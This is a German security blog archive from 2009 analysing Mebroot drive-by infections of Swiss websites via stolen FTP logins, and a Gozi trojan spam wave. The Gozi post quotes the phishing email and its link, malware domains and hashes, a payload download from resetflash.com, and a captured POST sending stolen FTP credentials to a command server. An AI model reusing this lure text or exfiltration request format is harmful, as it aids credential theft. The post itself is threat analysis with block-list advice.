Tag Archive for 'FTP credentials'

Drive-by infections – Die Spitze eines Eisberges?

Gestern stoss ich auf eine Schweizer Webseite (.ch), welche über eine Lücke im Adobe Reader das System des Besuchers mit einem Trojaner infiziert (eine sogenannte Drive-By Infektion). So weit eigentlich nichts aussergewöhnliches. Jedoch musste ich mit erschrecken feststellen, dass die Webseite bereits seit Dezember 2008 mit dem Drive-by infiziert ist. Um so schlimmer, dass es sich bei der verteilten Malware um den technisch ausgeklügelten Banken-Trojaner Mebroot (aka Sinowal) handelt.

Schrauben wir die Zeit einmal zurück: Im Oktober 2008 stiess Aladdin Knowledge Systems auf eine Liste mit über 200’000 gestohlenen Zugangsdaten zu FTP Accounts. Dabei handelt es sich um FTP Accounts, welche vom Banken-Trojaner Mebroot benutzt werden, um Drive-By Infektionen auf Webseiten zu platzieren. Unter den gestohlenen FTP Zugangsdaten waren auch rund 3’000 FTP Accounts aus der Schweiz. Die zuständigen Schweizer Provider wurden damals über die gestohlenen Daten informiert.

Zurück zu unserer gehackten Webseite: Wie bereits erwähnt, verteilt die Webseite bereits seit Dezember 2008 Malware – und sie ist in der Liste von Aladdin aufgeführt. Sprich: Obwohl der Provider im Dezember 2008 informiert wurden, verteilt die Webseite knapp 4 Monate danach immer noch Malware!

Leider ist dies kein Einzelfall. Es gibt einige duzend Webseiten, welche immer noch infiziert sind. Die Provider scheinen solche abuse Meldungen wohl nicht wirklich ernst zunehmen.

Wie bereits erwähnt, enthält die Liste vom Oktober 2008 nur Zugangsdaten zu FTP Accounts, welche vom Banken-Trojaner Mebroot benutzt werden. Neben Mebroot gibt es jedoch noch haufenweise anderer Trojaner wie z.B. Emold/Autorun oder Zbot/ZeuS, welche sich ebenfalls per Drive-By Infektion weiterverbreiten oder auf infizierten Systemen im Hintergrund Login Informationen zu FTP Accounts mitschneiden.

Was jetzt natürlich interessant wäre, wäre die Anzahl infizierter Webseiten in der Schweiz zu nennen. Leider gibt es keine offizielle Zahl. Eine Schätzung gestaltet sich äusserst schwierig. Von der einen oder anderen Seite habe ich jedoch bereits ein paar Zahlen gehört. Die Anzahl gekaperter FTP Accounts würde ich deshalb Vorsichtig auf 12’000 schätzen. Dies bedeutet jedoch nicht, dass auch 12’000 Webseiten infiziert sind. Zum Beispiel von Mebroot weiss man, dass dieser die Zahl der infizierten Webseiten in der Schweiz relativ konstant bei etwa ~300 hält, obwohl er ja eine Liste von über 3’000 gestohlenen FTP Accounts in der Schweiz besitzt. Die Zahl der infizierten Webseiten behält der Trojaner jedoch wahrscheinlich nur solange konstant, wie die Anzahl infizierter Computer in der Schweiz nicht unter einen bestimmten Wert fällt. Ist dies der Fall (wie z.B. im Dezember 08, als die Zahl der Infizierungen unter diesen Wert viel), stockt Mebroot die Anzahl der Webseiten auf, welche den Trojaner verbreiten (sprich er nutzt seine Liste der gestohlenen FTP Accounts, um die Zahl der infizierten Webseiten in der Schweiz zu erhöhen). Steig die Anzahl infizierter Computer wieder über diesen Schwellwert, desinfiziert der Trojaner einzelne Webseiten wieder bist sich die Zahl der infizierten Webseiten wieder bei ~300 ein pendelt.

Dieses vorgehen von Mebroot ist sehr interessant. Er besitzt zwar eine riesige Liste an gekaperten FTP Accounts, nutzt jedoch nur wenige davon wirklich aus, um sich weiter zu verbreiten. Nun stellt sich die berechtigte Frage wieso? Die Antwort ist relativ plausibel: Mebroot will nicht all zu sehr auffallen. Ein gutes Beispiel dafür, was passieren kann, wenn eine Malware zu grosses Aufsehen erregt, ist der Storm-Worm. Nachdem der Sturm-Wurm Hundertausende Computer infiziert hatte, versetzte Microsoft dem Trojaner am 11. September 2007 den Todesstoss, als Microsoft’s Malicious Software Removal Tool (MSRT) damit begann, infizierte System zu bereinigen. Mit höchster Wahrscheinlichkeit versucht Mebroot dies gezielt zu vermeiden.

Ein weiterer Grund sind wohl die Money-Mules: Was nützen den Kriminellen zehntausende gestohlene Bank-Daten, wenn sie nicht genügend Money-Mules haben, welche das gestohlene Geld entgegen nehmen und den Kriminellen weiter reichen?

Fazit

Ich kann mir gut vorstellen, dass der Trojaner Mebroot eine Menge Profit abwerfen würde. Da es den Kriminellen jedoch zunehmend schwerer fällt, Money-Mules zu finden, liegt dort ganz klar der Flaschenhals. Zudem darf man nicht vergessen, dass die Kriminellen jeden Money-Mule nur einmal benützten können. Danach müssen sich die Kriminellen auf die Suche nach neuen Money-Mules begeben.

Beim Thema Drive-By Infektionen sieht es in der Schweiz nicht anders aus, als in anderen Ländern. Auch hier sind Drive-By Infektionen ein ernst zu nehmendes Thema. Laut Sophos wird Weltweit alle fünf Sekunden eine Webseite infiziert (Quelle: Sophos Security Threat Report: Alle fünf Sekunden eine infizierte Website). Wer sich deshalb vor Drive-By Infektionen schützen möchte, sollte stets die auf dem Computer installierte Software wie z.B. Adobe Reader, Adobe Flash Player, Java RunTime, Firefox/Internet Explorer aber auch das Betriebssystem selbst auf dem neusten Stand halten. Unterstützung dabei bietet Secunia’s Personal Software Inspector (PSI), welcher die auf dem Heimcomputer installierten Applikationen regelmässig auf die Aktualität prüft (download).

Für Unternehmen gehört nebst dem regelmässigen Software patching auch ein geeigneter Web Proxy / Web Gateway zum Kern der heutigen Sicherheits-Infrastruktur, um Clients vor Drive-By Infektionen zu schützen.

Webmastern empfehle ich zudem, ihre Webseite mit dem MELANI Webseiten-Checktool auf Schadcode (sprich Drive-By Infektionen) überprüfen zu lassen (link).

Trojaner “Gozi” tarnt sich als E-mail von Classmates.com

Seit heute Morgen verbreitet sich der Trojaner Gozi, welcher uns bereits vom letzten Jahr her bekannt ist (siehe Post “Porno-Mails verbreiten Malware in der Schweiz” und “Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins”), über eine neue Spam-Welle:

Von: “Favors Committee” personalcenter@classmates.com
Betreff: Classmates Important Meeting Information

We are pleased to announce Class Reunion on January 24, 2009.

“Please join us for a night of fun as we celebrate our 2009 Year Class Reunion.
We don’t want to let another year go by without the opportunity for all of us to get together, reminisce about old times and learn about what our old friends have been up to.”

Proceed to view Your message:

http://classmates.profile.OnlineServlet.user-m5wy5irlu.coreupdtates.com/login_video737.htm?/default/LOGIN=rly3pelivndgc0y

With best regards, Wilda Groves. Customer Service Department.
Copyright 1995-2008 Classmates Online, Inc. All Rights Reserved.

E-Mail Text sowie die Absender E-Mail Adresse (personalcenter@classmates.com) ist jeweils gleich. Der Betreff der Spam-Mails unterscheidet sich jedoch:

  • Classmates Important Meeting Information
  • Reunion Classmates Notification!
  • Classmates Reunion Soon – [Class Reunion] Save the Date
  • Do-Not-Miss Classmates reunion.
  • Classmates Organiser Warning – Classmates Organisation.Have any special memories from when we were in high school?
  • Classmates Reunion – Invitation: Ready
  • Im Unterschied zur letzten Spam-Welle zielt der Trojaner dieses mal nicht explizit auf die Schweiz ab. Das E-Mail enthält jeweils einen langen Link auf eine der folgenden Webseiten:

  • coreupdtates.com
  • installkodekforwin.com
  • videoplayerkodeck.com
  • windowsmediakodeck.com
  • Die Domains werden wieder einmal mehr auf einem FastFlux Botnet gehostet (mit einer TTL von 1800 Sekunden):

    gozi_fastflux

    Besucht man eine der in den Spam-Mails angepriesenen Webseiten, wird dem Besucher sofort eine EXE-Datei zum download angeboten:

    gozi_jan09

    Die angebotene Datei ADMedia_Player.exe enthält den Trojaner Gozi, welcher derzeit von den Antivirenherstellern noch nicht all zu gut erkannt wird:

    Filename: ADMedia_Player.exe
    File size: 14933 bytes
    MD5…: 3427ffd0f5861a8170f7225395b7d3c3
    SHA1..: 53bc0d796cd603952cc9ab6c3f5065c3992711ca
    Erkennungsrate: 9/39 (23.08%)

    Nach ausführen der EXE-Datei nistet sich der Trojaner (wie auch letztes mal schon) im WINDOWS-Verzeichnis des Systems ein:

    C:\WINDOWS\9129837.exe
    C:\WINDOWS\new_drv.sys

    Kurz danach lädt der Trojaner weiteren Schadcode von resetflash.com nach (welche ebenfalls auf einem FastFlux Botnet gehostet ist):

    GET http://resetflash.com/flash.exe

    Filename: flash.exe
    File size: 36864 bytes
    MD5…: 87255d2928f3abfcdecc6255a84b0196
    SHA1..: 334ccfbeeea45e9c73cc7e3a2a3c6f0003d14987
    Erkennungsrate: 3/39 (7.69%)

    Der Trojaner zeichnet nun sämtliche HTTP, HTTPS und FTP Logins auf, welche vom infizierten Rechner aus gemacht werden und sendet die gesammelten credentials an einen Command&Controll Server (91.211.65.30 – Ural Industrial Limited Company RU):

    POST /cgi-bin/post.cgi HTTP/1.1
    Content-Type: multipart/form-data;
    User-Agent: IE
    Host: 91.211.65.30
    Content-Length: 363
    Cache-Control: no-cache

    —————————-6e6ea6e6ea6e6ea
    Content-Disposition: form-data; name=”upload_file”;
    Content-Type: application/octet-stream

    URL: sniffer_ftp
    ftp_server=ftp.serverdesopfers.ch&ftp_login=username&ftp_pass=passwort&version=0
    —————————-6e6ea6e6ea6e6ea–

    Fazit

    Da das E-Mail in englisch verfasst ist sowie viele Schweizer Internet Nutzer den Dienst “Classmates.com” nicht einmal kennen, dürften nur wenige Rechner in der Schweiz infiziert worden. Um eine Infektion vorzubeugen empfiehlt es sich für Unternehmen trotzdem, den Zugang zu folgenden Domains / IP Adressen zu unterbinden:

  • coreupdtates.com
  • installkodekforwin.com
  • videoplayerkodeck.com
  • windowsmediakodeck.com
  • resetflash.com
  • 91.211.65.30



  • economics-recluse
    Scene
    Urgent!